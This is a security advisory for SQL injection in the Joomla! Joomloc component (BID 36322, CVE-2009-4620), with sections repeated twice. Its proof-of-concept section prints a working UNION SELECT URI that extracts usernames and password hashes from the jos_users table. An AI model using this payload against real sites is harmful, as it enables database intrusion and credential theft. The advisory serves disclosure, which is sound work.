Joomla! Joomloc Component 'id' Parameter SQL Injection Vulnerability
BID:36322
Info
Joomla! Joomloc Component 'id' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 36322 |
| Class: | Input Validation Error |
| CVE: |
CVE-2009-4620 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 09 2009 12:00AM |
| Updated: | Apr 13 2015 09:06PM |
| Credit: | Chip D3 Bi0s |
| Vulnerable: |
L-aubrotel Web Services Joomloc 1.0 |
| Not Vulnerable: | |
Discussion
Joomla! Joomloc Component 'id' Parameter SQL Injection Vulnerability
The Joomloc component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The Joomloc component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Joomla! Joomloc Component 'id' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?option=com_joomloc&controller=loc&view=loc&layout=loc&task=edit&cid[]=1&id=1 and 1=2 union select 1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56+from+jos_users
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?option=com_joomloc&controller=loc&view=loc&layout=loc&task=edit&cid[]=1&id=1 and 1=2 union select 1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56+from+jos_users
Solution / Fix
Joomla! Joomloc Component 'id' Parameter SQL Injection Vulnerability
Solution:
Updates are available. Please contact the vendor for details.
Solution:
Updates are available. Please contact the vendor for details.
References
Joomla! Joomloc Component 'id' Parameter SQL Injection Vulnerability
References:
References:
- Joomloc Homepage (L-aubrotel Web Services)